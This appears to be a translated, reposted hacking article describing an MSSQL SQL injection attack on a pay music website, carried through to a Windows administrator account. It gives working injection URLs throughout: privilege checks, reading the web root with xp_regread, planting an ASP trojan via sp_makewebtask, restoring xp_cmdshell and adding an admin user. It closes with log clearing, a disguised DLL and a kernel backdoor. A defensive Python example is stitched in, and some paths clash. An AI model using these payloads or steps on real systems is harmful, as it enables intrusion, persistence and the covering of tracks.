Pure script attack - using pure script techniques to get system privileges

xiaoxiao2021-03-06  36

One. The principle of getting a WebShell through SQL injection:

N.E.V.E.R: the WebShell is obtained with the database backup feature. Create a table with one field to hold the Trojan data, use MSSQL's backup feature to export the whole database to a file, and finally delete the new table.

Analysis: N.E.V.E.R's method relies on MSSQL's database backup feature. The database is exported to a file whose name ends in .asp, and that file is saved under the web path. The question is whether the exported file, when interpreted as ASP, contains usable <% %> blocks. If the database already holds another <% %> block somewhere and that block contains an error, the exported ASP file will not work. However, the chance of that is not large.

Let's take a look at the CZY method.

CZY method: basically the same as N.E.V.E.R's, except that it uses the extended stored procedure sp_makewebtask. This extended stored procedure exports the records of a table in the MSSQL database and saves them to a file. It does not have the problem above, because we only read the value of a single field in the table and write that field's content out to generate the file, and the value in that field is exactly what we added. Test the data before adding it; if it works then, the exported file will certainly work too.

I have tested both methods by hand: use the SQL injection vulnerability to create the table, add data to the table, export the data, and then delete the table. Both methods use nothing but SQL statements. I won't say much more here; everyone can read the article in this issue.

What is very popular on the Internet at present is the SQL injection vulnerability we usually talk about. We use this kind of vulnerability to query database information, to cross databases, and to upload files through forums to get a WebShell on the host (these are common techniques, and Black Defense has also described them in detail).

Some time ago I did a security test of a large pay music website. In the end I used pure script techniques to obtain system administrator privileges. So today I will lay out my concrete approach for everyone.

One. Footprinting

Footprinting is the first step of a security test of a server. Let's start with a port scan of the server. I took out a very good scanner written by a friend of mine; it is quite fast and can open 2000 threads at once! (WTF: Good!) In no time the scan of ports 1-65535 was done.

The open port of the scan is as follows:

21, 80, 1433, 3389

A second scan gave the same result, so it is almost certainly just these. Since the Blaster worm, servers on the network have become much more secure, and intrusion through system vulnerabilities has become difficult. Let me analyse first: I set my sights on ports 21 and 1433. Now it is only down to luck, to see whether I can scan out a weak password (WTF: oh, wishful thinking!). I was unlucky: I scanned for a long time, and where I would usually turn up a machine, today nothing came out. It seems I can only look for a way in through the website's scripts.

Two. Thorough exploration of the website

Port 1433 is open, which is the SQL Server service. Websites are generally built on ASP + MSSQL, and injection vulnerabilities in ASP scripts are easier to find than other script vulnerabilities and far more numerous. Under normal circumstances I add a single quote after a submitted parameter; if the parameter is not filtered, IE generally returns an error message. I quickly found a parameter without any filtering.

Submitted: http://www.something.com/script.asp?id=2'

IE returns:

Microsoft OLE DB Provider for ODBC Drivers Errors '80040e14'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] string '' has no closed quotes.
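The error above is produced because the id parameter is pasted straight into the SQL text. The following is an added example, not code from the original article: it shows that vulnerable pattern beside a hardened version that validates the id as an integer and binds it as a parameter. It goes a little beyond the single-quote probe and also runs the boolean probes used later in the article. SQLite is used as an offline stand-in for MSSQL (an assumption; with pyodbc against SQL Server the placeholder is also ?, and the technique is identical); the table name, rows and function names are all constructed for this example.

```python
"""Unsafe string concatenation beside input validation + bound parameters.

Added example; SQLite stands in for MSSQL so it runs offline.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the site's article table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE script (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO script VALUES (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, raw_id: str) -> list:
    """Vulnerable pattern: the parameter becomes part of the statement text,
    so 'id=2 and 1=2' alters the WHERE clause and a stray quote raises the
    same kind of syntax error the article uses as its oracle."""
    sql = "SELECT title FROM script WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


ID_PATTERN = re.compile(r"[0-9]{1,9}")


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hardened: reject anything that is not a plain integer before any SQL
    runs, then bind the value so it can never change the statement structure."""
    if not ID_PATTERN.fullmatch(raw_id):
        raise ValueError("id must be a positive integer")
    rows = conn.execute("SELECT title FROM script WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows]


def demo() -> dict:
    """Run the probes from the article against both versions and collect results."""
    conn = make_db()
    results = {
        "normal": lookup_unsafe(conn, "2"),
        "and_1_1": lookup_unsafe(conn, "2 and 1=1"),   # same record: condition true
        "and_1_2": lookup_unsafe(conn, "2 and 1=2"),   # no record: condition false
    }
    try:
        lookup_unsafe(conn, "2'")
        results["quote"] = "no error"
    except sqlite3.OperationalError as exc:
        results["quote"] = "error: " + str(exc)     # unterminated quote -> syntax error
    # Hardened path: the same probes never reach the database.
    for probe in ("2 and 1=1", "2'"):
        try:
            lookup_safe(conn, probe)
            results["safe:" + probe] = "accepted"
        except ValueError:
            results["safe:" + probe] = "rejected"
    results["safe:2"] = lookup_safe(conn, "2")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>16}: {value}")
```

The boolean probes return different rows only through the unsafe function; the hardened one rejects them before a query is built, which is why whitelisting the parameter type is the first fix and parameter binding the second.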

Submitted: http://www.something.com/script.asp?id=2 and 1=1
IE returns the normal record.
Submitted: http://www.something.com/script.asp?id=2 and 1=2
IE returns no record.

OK, this confirms the vulnerability exists. Let's use it to get some information about the server and database. For example, to check the server's patch level, submit:
http://www.something.com/script.asp?id=2 and 1=(select @@version)
An error occurs, and IE returns the error message shown in Figure 1.

Figure 1

It seems the SP4 patch is installed. "It is said" that even after SP4 there is still an overflow for port 80 and an overflow for MSSQL SP3, but these are "absolutely confidential"; very few people can get them, and I don't have them anyway, so I'll leave that for another day. Let's continue! This server is fairly secure at the system level, so I still have to start from the scripts. Let's look at the privileges of its database connection account. Submit:
http://www.something.com/script.asp?id=2 and 1=(select is_srvrolemember('sysadmin'))
It returns normally, so the account has the sysadmin server role.

WTF: is_srvrolemember('role' [, 'login']) determines whether the current user's login is a member of the specified server role. role is the name of the server role being checked; login is optional, and if it is not specified the current user's login account is used. If login is a member of role it returns 1, otherwise 0; if role or login is invalid, it returns NULL.

I almost spat my tea onto the screen. The currently connected account actually has sysadmin privileges! As shown in Figure 2:

Figure 2

Haha! It seems the connection account is sa. Submit:
http://www.something.com/script.asp?id=2 and 'sa'=(select system_user)
This checks whether the connection account is sa. IE returns normally again, which proves the account really is sa; the privileges are that high.

WTF: When an application role is in use, SELECT USER returns the name of the application role currently in use. To get the identity of the logged-in user, use the Transact-SQL statement SELECT SYSTEM_USER.

Here many people may think of using the xp_cmdshell extended stored procedure to add a system account and then connect to the server with the terminal service.

That is a very good idea! I am one of those many people! Let's try it!

Three. Using MSSQL stored procedures to get a WebShell

Let's see whether xp_cmdshell has been deleted by the administrator! Submitted:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
IE returned the following:

adodb.field error '800A0bcd'

Either BOF or EOF is "true", or the current record has been deleted; the requested operation requires a current record.

It seems xp_cmdshell has been deleted. Oh well, let's restore it!
http://www.something.com/script.asp?id=2;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
Try again to see whether xp_cmdshell has been restored:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
(WTF: in a later attempt the editor found that xp_cmdshell had been restored; haha, I don't know which brother left that behind.)
Still the same: nothing is returned. This proves the administrator has renamed the dynamic link library xplog70.dll; since it was renamed rather than deleted, restoring it directly is not possible. All I can say to that is "I will bear it"! Such a big vulnerability and it cannot be used easily; I am not willing to accept that. Let's leave it for now; once I have a WebShell I will naturally have a way to deal with it, hahaha... (sinister smile!).

Let's see how to get a WebShell! Have you read n.e.v.e.r's and czy's article? Both have introduced their WebShell methods in detail. I have also written their methods into a program for my own convenience, but the hard part is getting the absolute path of the web root. Where does the Trojan we generate end up? This may be a problem many experts have been studying. Fortunately I understand MSSQL fairly well, and I have a way to get the web absolute path; follow me. (WTF: this is definitely a very big highlight! Everyone look!)

We will use two MSSQL stored procedures. First let me introduce the xp_regread extended stored procedure and the sp_makewebtask web assistant stored procedure: xp_regread reads registry information, and we use it to get the web absolute path that IIS saves in the registry. sp_makewebtask is what gets us the WebShell; its main function is to export the records of a table in the database to a file whose name you can specify yourself. Of course, we specify an ASP script file!

Imagine the script code saved in the table: the exported file is then the script file. So the record we add is the script code. Here I do not use n.e.v.e.r's method. His way exports the database file, which is relatively large and full of garbage; if there is an ASP tag elsewhere with broken ASP code, it fails and the page mostly returns a 500 error. So we use CZY's method, which uses a web task to get the shell.

1. How do I get the web absolute path? Haha, I spent a long time studying this problem.

Everyone knows Microsoft keeps its settings in the registry. We can get the path from the registry at the following location:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots
Using the extended stored procedure xp_regread we can obtain its value:
EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/'
That reads it out, but now the problem: how do we get the value back in IE? My method: create a temporary table with one field of type char(255), and use it to save the value of the web absolute path. After the table is built, read the registry as above and save the returned value in a variable, then insert that variable as a record into the new table. That way the path is written into the table. Submit:
DECLARE @result varchar(255); EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result OUTPUT; INSERT INTO <temporary table> VALUES (@result);--
Then submit:
1=(select count(*) from <temporary table> where <temporary field name>>1)
IE's error message now reports the web path we just inserted. I also tried making the variable itself raise the error so that IE returns its value, but that failed, which is why I came up with building a temporary table and adding data to it. Finally we delete the temporary table we built. WebShell obtained; this part of the work ends here.

2. How do I get the WebShell? CZY has written about it in great detail, so I will only mention it briefly! Create a table with one field and add the Trojan content to that field. Then export the content to an ASP script in the web absolute path via the sp_makewebtask stored procedure, and delete the temporary table again. Done.
For example:
exec sp_makewebtask @outputfile='<web absolute path>\<export file name>.asp', @query='select <your field> from <your temporary table>'
Oh, and the result comes out. Of course, I have written a program for this, so you don't have to add the data line by line yourself (WTF: this issue has a detailed introduction! Nobody will be disappointed!). Method and ideas are written; now let's take action. First let's see whether his two stored procedures have been deleted.

If they've been deleted, I don't want to live! Submitted:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
and:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where name='sp_makewebtask')
La la la! What a day, I'm happier than at New Year. Both returned normally! The two stored procedures we need have not been deleted.

WTF note: administrators generally do not delete these two; perhaps they understand them less and pay no attention to them. That is exactly where the danger lies! Hehe.

OK, now to get the web absolute path. Build a table:
http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd] [char](255));--
We have now created a table named cyfd with a field gyfd of type char and length 255. Then add data to the table:
http://www.something.com/script.asp?id=2;declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into cyfd values(@result);--
This reads the web absolute path from the registry and inserts it into the table we just built. Then make it report the absolute path:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd>1)
IE returns an error, and from it we get the web absolute path "D:\Inetpub\wwwroot"! After all that effort, this is very sweet! Time for tea! As shown in Figure 3:

Figure 3

Then delete the table we just built. Submitted:
http://www.something.com/script.asp?id=2;drop table cyfd;--
OK, now we have the path. Open the program I wrote to get the WebShell, enter the vulnerable URL: http://www.yfd.com/yfd.com?id=2 and enter the absolute path for saving the Trojan: D:\inetpub\wwwroot.

The Trojan I use is already configured; its code is streamlined to only 30 lines, so submitting the data to the server is fast. The Trojan's main function is to take input and save the input content as a file. Through such a Trojan we can then place some more powerful script Trojans, such as the Ocean Trojan. In less than a minute the program had finished running.

Enter the corresponding path, wahaha (WTF: who wants a sip of this "drink"? Haha!), the WebShell appears, and at top speed the Ocean Trojan is in place, as shown in Figures 4 and 5:

Figure 4
Figure 5

I am living in happiness! WTF often says this sentence; I seem to have been infected by it today! Now let's continue!

Four. Restore xp_cmdshell and get system privileges!

The following work is very simple. In under 10 minutes you have an administrator account. I said xp_cmdshell had been deleted and could not be restored; that is because the administrator deleted or renamed the xplog70.dll file. No matter: upload an xplog70.dll through the WebShell and everything is solved. I quickly uploaded the xplog70.dll file to the E:\inetpub\wwwroot directory. Come, let's restore it. Submitted:
http://www.something.com/script.asp?id=2;exec master.dbo.sp_addextendedproc 'xp_cmdshell','E:\inetpub\wwwroot\xplog70.dll'
Restoring with an absolute path is supported. :) Figure 6:

Figure 6

OK. Let's use IE to see whether it has been restored. Submitted:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
Hehe, it returns normally. It has been restored. Do you still need me for the rest? Haha! Add an account:
http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell 'net user chouyfd Chouyfd1314yf /add'
Promote it to administrator:
http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators chouyfd /add'
Done. Open your terminal connection and log in! Haha, finally mine. At this point I successfully obtained a system administrator account on this host, as shown in Figure 7:

Figure 7

The remaining work is to clear the logs and leave a super back door. Go!

Five. Afterwards

After the work is done, connect through the terminal and remove the IIS log and the MSSQL log as fast as possible. At the same time delete xp_cmdshell again so he does not find it; if he finds nothing he will do nothing. Move the xplog70.dll I uploaded into the System32 directory and rename it to something nobody recognises, msxlog32.dll (even if he searches he won't find it, haha!). Then install the kernel back door program provided by the pigs to the super users, and patch the vulnerable script file.

Please credit the original when reposting: https://www.9cbs.com/read-66958.html
